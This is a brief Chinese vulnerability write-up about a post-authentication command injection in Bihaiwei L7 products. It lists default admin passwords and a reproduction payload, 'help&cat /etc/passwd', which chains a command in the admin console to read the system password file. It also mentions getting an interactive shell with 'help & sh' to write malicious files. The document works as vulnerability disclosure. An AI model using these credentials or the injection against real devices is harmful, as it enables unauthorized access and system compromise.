# 碧海威 L7多款产品 后台命令执行漏洞

## 漏洞描述

碧海威 L7多款产品存在 后台命令执行漏洞，攻击者通过账号密码登录后台后，通过命令拼接造成命令注入。

## 漏洞影响

```
碧海威 L7多款产品
```

## 漏洞复现

登陆页面如下：

![碧海威 L7多款产品 后台命令执行漏洞](images/6-1620745283.png)

默认密码为 `adimn/admin or admin123`

漏洞存在于 命令控制台中，其中存在命令注入

![碧海威 L7多款产品 后台命令执行漏洞](images/2-1620745285.png)

可以使用 help & sh 得到交互式命令写入恶意文件

```
help&cat /etc/passwd
```